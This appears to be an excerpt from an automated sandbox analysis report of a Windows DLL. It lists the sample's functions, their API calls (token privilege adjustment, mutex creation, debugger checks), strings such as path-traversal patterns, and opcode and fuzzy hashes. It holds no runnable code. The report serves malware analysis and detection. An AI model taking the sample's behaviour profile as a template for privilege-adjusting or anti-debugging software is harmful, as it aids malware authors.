Instruction Fuzzy Hash: 2801DF71A2512CA6FBFBC719C510FE836A2976C7D8F74C103E80502AC0DE12CA8ADF21

Function 000000018000D0DC Relevance: 1.5, APIs: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 000000018000D10F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 45a92f52fc0701a6052ba7a38d71c7f4b30ca79feb5076f9f1700aca98d9e0d9
Instruction ID: 1d2bc234544b05135b076b3f4c618391e3975a8b2a5dfcaf9b45af1431b24e04
Opcode Fuzzy Hash: 45a92f52fc0701a6052ba7a38d71c7f4b30ca79feb5076f9f1700aca98d9e0d9
Instruction Fuzzy Hash: E301CC3772468887E748CF2AE581798B7A0B78CBC0F54812AEB0983B54CF34D995CB00

Function 0000000180004F20 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SHGetPathFromIDListW.SHELL32 ref: 0000000180004F70

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: FromListPath
String ID:
API String ID: 3839826586-0
Opcode ID: 41cebb645bf9a3c71c5451b41088e2b3d016f1fb6057b38c4aad76eeacd421db
Instruction ID: 12e4207a284de3e4efdd74e293213f05f08e76553ddeb50f55038ebdb69c4969
Opcode Fuzzy Hash: 41cebb645bf9a3c71c5451b41088e2b3d016f1fb6057b38c4aad76eeacd421db
Instruction Fuzzy Hash: 7701D872624B8882EB61DB21E8553EA7350F7DD784F409125FA8E0764ADF3CC3498700

Function 000000018000D1E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32 ref: 000000018000D203

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1592680760631c39adfae282877fbe7b71f57cbe683cd3b2ecd650313e0d12a0
Instruction ID: 5db237b18b434165adb9924bfb5f0821b8c9a73d14b0177cabe02d0576b5169f
Opcode Fuzzy Hash: 1592680760631c39adfae282877fbe7b71f57cbe683cd3b2ecd650313e0d12a0
Instruction Fuzzy Hash: 81E0203660508C85F7B7CB7DC0447A93760C77CB84F1CC441E60502584CE15C5DB8720

Function 00000001800044A8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

Part of subcall function 00000001800050C0: ExitProcess.KERNEL32 ref: 00000001800050D5

Part of subcall function 0000000180004BFC: GetCurrentProcess.KERNEL32 ref: 0000000180004C1D
Part of subcall function 0000000180004BFC: OpenProcessToken.ADVAPI32 ref: 0000000180004C2F
Part of subcall function 0000000180004BFC: LookupPrivilegeValueW.ADVAPI32 ref: 0000000180004C4A
Part of subcall function 0000000180004BFC: AdjustTokenPrivileges.ADVAPI32 ref: 0000000180004C8A
Part of subcall function 0000000180004BFC: GetLastError.KERNEL32 ref: 0000000180004C94
Part of subcall function 0000000180004BFC: Sleep.KERNEL32 ref: 0000000180004CC6
Part of subcall function 0000000180004BFC: CloseHandle.KERNEL32 ref: 0000000180004CD0

Part of subcall function 0000000180008100: CreateMutexW.KERNEL32 ref: 0000000180008114
Part of subcall function 0000000180008100: GetLastError.KERNEL32 ref: 000000018000811F

ExitProcess.KERNEL32 ref: 00000001800044CC

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Process$ErrorExitLastToken$AdjustCloseCreateCurrentHandleLookupMutexOpenPrivilegePrivilegesSleepValue
String ID:
API String ID: 1805699633-0
Opcode ID: 0065c218f65f5626bc10955be951d7cb19a620b5bb23de5ee824e7eb783c9040
Instruction ID: b5ee993cd68d47cad0632b8bd12e6610cde57e749f6b0764f6e34e8e19a60b89
Opcode Fuzzy Hash: 0065c218f65f5626bc10955be951d7cb19a620b5bb23de5ee824e7eb783c9040
Instruction Fuzzy Hash: 1CD01230602A8C80EADFF3B4086B3DE25242F0C7C1F00C4297002011D38D28839C4322

Function 0000000180020318 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000000018002036D

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: a1f60aefd55be852a83b51dc19f23318ad457bc9196a783a40380938ac71195c
Instruction ID: 82fd279e561d0853b3da2cb113c0942a7bbb1dc8820051ba711847d9dbe9cfeb
Opcode Fuzzy Hash: a1f60aefd55be852a83b51dc19f23318ad457bc9196a783a40380938ac71195c
Instruction Fuzzy Hash: 44F01D7430170C82FFDB97A158553D953895B8DBC0F6CC421B90A866E2DF5CC78D8311

Function 000000018002556C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00000001800255AA

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 9aea96639d9b7dd11a7ea2e2b4ee360ee4cbb66b4d0839e2be98222e3a6788c2
Instruction ID: db42b9add9c0d64b6219cc3f0309d20b3c6db80b7d50203088a6abec9d9780a3
Opcode Fuzzy Hash: 9aea96639d9b7dd11a7ea2e2b4ee360ee4cbb66b4d0839e2be98222e3a6788c2
Instruction Fuzzy Hash: 30F08C30312A5C85FFE767B158697E913815B4CBE6F08CA207C668A3C9DE78C6888718

Non-executed Functions

Function 000000018000A068 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 347timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000D164: SetFilePointer.KERNEL32 ref: 000000018000D19E

MultiByteToWideChar.KERNEL32 ref: 000000018000A20C
LocalFileTimeToFileTime.KERNEL32 ref: 000000018000A384

Strings

/..\, xrefs: 000000018000A281
/../, xrefs: 000000018000A26D
\../, xrefs: 000000018000A259
\..\, xrefs: 000000018000A23F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: File$Time$ByteCharLocalMultiPointerWide
String ID: /../$/..\$\../$\..\
API String ID: 3172667723-3885502717
Opcode ID: 1a8afd9cb175600a78d15287651243128a287261bfeaf5010580accabdd9cf22
Instruction ID: d8fab8bb007b6f11a0e32248e7e611dbf0dda9bc79147fc556e01963c758ccbe
Opcode Fuzzy Hash: 1a8afd9cb175600a78d15287651243128a287261bfeaf5010580accabdd9cf22
Instruction Fuzzy Hash: A8E1B172608A8886FBA6CF25E4507DE77E0F3897C4F45C026EB8947785EE79D649CB00

Function 000000018002B8EC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E76D

GetUserDefaultLCID.KERNEL32 ref: 000000018002BA5C

Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E79A
Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E7AB
Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E7BC

EnumSystemLocalesW.KERNEL32 ref: 000000018002BA43
ProcessCodePage.LIBCMT ref: 000000018002BA86
IsValidCodePage.KERNEL32 ref: 000000018002BA98
IsValidLocale.KERNEL32 ref: 000000018002BAAE
GetLocaleInfoW.KERNEL32 ref: 000000018002BB0A
GetLocaleInfoW.KERNEL32 ref: 000000018002BB26

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: ae4c162fad16733e796f7a981602afeaf1efae4e7cde59196332f827b414aadd
Instruction ID: f7b37e13b4f78c4fb94ccdd2454f6e12fee8f39838e8a55217b6ca1921296c56
Opcode Fuzzy Hash: ae4c162fad16733e796f7a981602afeaf1efae4e7cde59196332f827b414aadd
Instruction Fuzzy Hash: 3D7167727007088AFB939B61D8507ED33B4BB4CBC8F44C526EA5993A95EF38CA49C311

Function 00000001800102C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000001800102DC
RtlCaptureContext.KERNEL32 ref: 0000000180010309
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180010323
RtlVirtualUnwind.KERNEL32 ref: 0000000180010364
IsDebuggerPresent.KERNEL32 ref: 00000001800103B8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001800103D9
UnhandledExceptionFilter.KERNEL32 ref: 00000001800103E4

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 35f7c7bd2ccaf0af883b9bb363d3c67bdee9e1d1d7564df4543d4ff367ad991e
Instruction ID: cdbf820431aba49d9c3e232fd8917a9be81b81ba2e3d82612c6d734815f4e6fc
Opcode Fuzzy Hash: 35f7c7bd2ccaf0af883b9bb363d3c67bdee9e1d1d7564df4543d4ff367ad991e
Instruction Fuzzy Hash: 28316172204F848AEBA18F60E8403EE7364F788784F548129EA8E47B98DF78C65CC710

Function 0000000180015F04 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000180015F7D
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180015F95
RtlVirtualUnwind.KERNEL32 ref: 0000000180015FD0
IsDebuggerPresent.KERNEL32 ref: 0000000180016009
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180016013
UnhandledExceptionFilter.KERNEL32 ref: 000000018001601E

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ab5718db59ea21ea970444a0811ff5ad989c4a03954f4d06bc89c748b39c9169
Instruction ID: 09cf47260382510ce7b39014f476f0cba4be6acbf12e87874cf5ea67f55df811
Opcode Fuzzy Hash: ab5718db59ea21ea970444a0811ff5ad989c4a03954f4d06bc89c748b39c9169
Instruction Fuzzy Hash: 8F314F36204F8489DBA28B25E8403DE73A4F78C795F544125EA9D43B99DF38C2598B00

Function 000000018002AEB8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

GetACP.KERNEL32 ref: 000000018002AFA5
IsValidCodePage.KERNEL32 ref: 000000018002AFCD

Strings

utf8, xrefs: 000000018002B0B1

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLast$CodePageValidValue
String ID: utf8
API String ID: 1184045147-905460609
Opcode ID: bef330d46705c9f809254f28dcd34f18f5fa3df4ecd6a7cd7be12881656582f3
Instruction ID: b7e41fea45c37c7491a6b061c9b38722cf8aeb20eeb6de915e3b026b6f3d138d
Opcode Fuzzy Hash: bef330d46705c9f809254f28dcd34f18f5fa3df4ecd6a7cd7be12881656582f3
Instruction Fuzzy Hash: 9A91863220478986FBA79F61D9513EA33A4E78DBC0F84C521EE5987786DF38CA59C341

Function 000000018000E318 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000000018000E379
IsDebuggerPresent.KERNEL32 ref: 000000018000E391
OutputDebugStringW.KERNEL32 ref: 000000018000E3A2

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000E39B

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: b212772aa1cfda86b8dd2b2796d1cb41c1d329d713af6930b26328a09feb1268
Instruction ID: ff717276d0f11779129c24c89c8ea0c62bf3958c183b28a318c48e6cba1cd9b0
Opcode Fuzzy Hash: b212772aa1cfda86b8dd2b2796d1cb41c1d329d713af6930b26328a09feb1268
Instruction Fuzzy Hash: 9B115E32210B8897F786DB22D6453EA33A4FB0C395F548129EA4983A50EF78D6B8C700

Function 000000018000B7E0 Relevance: 5.6, Strings: 4, Instructions: 573COMMON

Download Yara Rule

Strings

invalid stored block lengths, xrefs: 000000018000BF97
invalid bit length repeat, xrefs: 000000018000BFAB
too many length or distance symbols, xrefs: 000000018000BF7B
invalid block type, xrefs: 000000018000BBD7

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
API String ID: 0-26694007
Opcode ID: bf2efda4cf8fba31aa37c184d76348b94fd6732ddcc2538625d3b8afcc60e458
Instruction ID: e406b83e570d1ac13d4d9bf08117dba668357e1ade72b0d2d39afb1ba7880cbd
Opcode Fuzzy Hash: bf2efda4cf8fba31aa37c184d76348b94fd6732ddcc2538625d3b8afcc60e458
Instruction Fuzzy Hash: B73294732146899BE7A9CF29D5507AE7BA1F348788F50C119EB5683B90DF38E664CF00

Function 000000018002B36C Relevance: 4.7, APIs: 3, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E76D

GetLocaleInfoW.KERNEL32 ref: 000000018002B3D8

Part of subcall function 0000000180027394: _invalid_parameter_noinfo.LIBCMT ref: 00000001800273B1

GetLocaleInfoW.KERNEL32 ref: 000000018002B421

Part of subcall function 0000000180027394: _invalid_parameter_noinfo.LIBCMT ref: 000000018002740A

GetLocaleInfoW.KERNEL32 ref: 000000018002B4EC

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: 943bd00b0f887e443bda1b679887d11a12100e3a774b661fefa57e7bcbab9ed8
Instruction ID: 8a4619616076351242ef1636d449e5c3ff567f37869466ed960a84759d707c42
Opcode Fuzzy Hash: 943bd00b0f887e443bda1b679887d11a12100e3a774b661fefa57e7bcbab9ed8
Instruction Fuzzy Hash: 0E61BF32700A498AEBB79F11E5803E973A1F38C7C4F00C125EB9AC7695DF38D6598700

Function 00000001800208DC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 0000000180020950

Strings

GetLocaleInfoEx, xrefs: 00000001800208F8, 0000000180020909

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 2d719562c5ede7e9e1d30d2fd55054e376b7769ba9d2f30ab5df7b690f0ec345
Instruction ID: 23810ecc44a9fa88f8e33a0a850563ebb3a2f1248dbd5b6f14710a77e5edf504
Opcode Fuzzy Hash: 2d719562c5ede7e9e1d30d2fd55054e376b7769ba9d2f30ab5df7b690f0ec345
Instruction Fuzzy Hash: A8016231704B8899E7879B56B4403D7B765EB8DBD0F68C025BE4903B6ACF38C649C740

Function 0000000180026790 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00000001800269DF
RaiseException.KERNEL32 ref: 00000001800269F0

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 28f4fd1ef61debef4260460d3945bd874c4ab6355434d2c4b069aa2d38af04af
Instruction ID: 1e169638cfd7896d9537b61c89f1ecd955dc27dbc1e6111228ce66f3979a8fca
Opcode Fuzzy Hash: 28f4fd1ef61debef4260460d3945bd874c4ab6355434d2c4b069aa2d38af04af
Instruction Fuzzy Hash: 07B11A77A00B888BEB56CF29C48639C77A0F348B89F15C916EA59877B4CF35C955CB01

Function 0000000180004358 Relevance: 2.6, APIs: 2, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00000001800043B5
MultiByteToWideChar.KERNEL32 ref: 00000001800043F9

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 7930196372a178743dc39e7295959fbfc0f589fc39fb1272cd01465258609be2
Instruction ID: 442d9dd9449f21a17d12aaac5eace401825d2169cc146f363dd87afd48597ddc
Opcode Fuzzy Hash: 7930196372a178743dc39e7295959fbfc0f589fc39fb1272cd01465258609be2
Instruction Fuzzy Hash: 1B312A73A04B8846E756DB32E8013EA7361FB8DBD5F14C325BE590A696DF78C3898340

Function 0000000180019A4C Relevance: 1.9, APIs: 1, Instructions: 371COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000180019B94

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 027032dcfb386713951d006e6205e2874f5c1696f4cb7ea4b2638cfb0ac95091
Instruction ID: eec4c6fd3ff957a542273620c993138e7d13cf4136450a887ec4fef81301abd9
Opcode Fuzzy Hash: 027032dcfb386713951d006e6205e2874f5c1696f4cb7ea4b2638cfb0ac95091
Instruction Fuzzy Hash: E3128B32A09BC886E792CF2894443ED73A4F75D788F55D225EF8983696EF34D289C740

Function 00000001800296F4 Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb5b123465c62c52230c863fe300e552722264977c3af6977275130b1d48977
Instruction ID: 738cc9b322281c0339e23103a8d83c8b40299d0502414f2eebc0fa67005e5938
Opcode Fuzzy Hash: 6bb5b123465c62c52230c863fe300e552722264977c3af6977275130b1d48977
Instruction Fuzzy Hash: 6FE16032605B8896E762DB61E4407EE37A8F7987C8F418625AF9D57796EF38C349C300

Function 000000018002CDB0 Relevance: 1.7, APIs: 1, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 000000018002CE13

Part of subcall function 000000018002C5C4: _invalid_parameter_noinfo.LIBCMT ref: 000000018002C5D8

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: ecd189087dc3da18299c797459eb2146145bc70b9274cef2fdfea02dce14d3d8
Instruction ID: 6ee684c52c9e23d98a53d5edf7e203a0a12931d0e7d9addfecf6a81e65398c4d
Opcode Fuzzy Hash: ecd189087dc3da18299c797459eb2146145bc70b9274cef2fdfea02dce14d3d8
Instruction Fuzzy Hash: CD610D3270059846FBF789288450FEDA792A74C7E0F15C23AFA6987AD1DE75CA488702

Function 0000000180027938 Relevance: 1.6, APIs: 1, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113b1b040826d01e5cdf2fd91c665917d5d86a6bb9bf63b09fafb4602ddadf74
Instruction ID: 21e9b30a6c3738534fa2c19576fd53ca8bd796d29e4d3d6577ec0e2954d72561
Opcode Fuzzy Hash: 113b1b040826d01e5cdf2fd91c665917d5d86a6bb9bf63b09fafb4602ddadf74
Instruction Fuzzy Hash: 0F51D332700B9485EB629B76A8407DE7BA6F748BE8F148115FE5827B8ACF38C2458700

Function 000000018002B5B8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

Part of subcall function 000000018001E728: FlsSetValue.KERNEL32 ref: 000000018001E76D

GetLocaleInfoW.KERNEL32 ref: 000000018002B620

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: cb4b30877e75dff9778b46eedd80eaa1e424086c74a345ae397bbffbb95bed5b
Instruction ID: e472ee6b97786968e4dc3212f9f96c15afba4a5b4e6154bd9219fb89b44dadf6
Opcode Fuzzy Hash: cb4b30877e75dff9778b46eedd80eaa1e424086c74a345ae397bbffbb95bed5b
Instruction Fuzzy Hash: 7B316F3230468986FBA6DB21E4453EE73A1F78C7C4F44C125AB89C7696DF3CD6598700

Function 000000018002B204 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

EnumSystemLocalesW.KERNEL32 ref: 000000018002B2A2

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 4a67e4b09e862c523ae46ee8860dd969e8c3cef9e159523c794b45cfeabef760
Instruction ID: 5398c2de42df62b33a0f9e9e1fc644b1e4c382401b3f5c1d21dbf2b97d2c7d3b
Opcode Fuzzy Hash: 4a67e4b09e862c523ae46ee8860dd969e8c3cef9e159523c794b45cfeabef760
Instruction Fuzzy Hash: 9E11A273A04648CAEB978F56D0807ED7BA1F798BE0F45C116E665833D0DA34C6D9C740

Function 000000018002B7C0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001E728: GetLastError.KERNEL32 ref: 000000018001E737
Part of subcall function 000000018001E728: FlsGetValue.KERNEL32 ref: 000000018001E74C
Part of subcall function 000000018001E728: SetLastError.KERNEL32 ref: 000000018001E7D7

GetLocaleInfoW.KERNEL32 ref: 000000018002B7F7

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
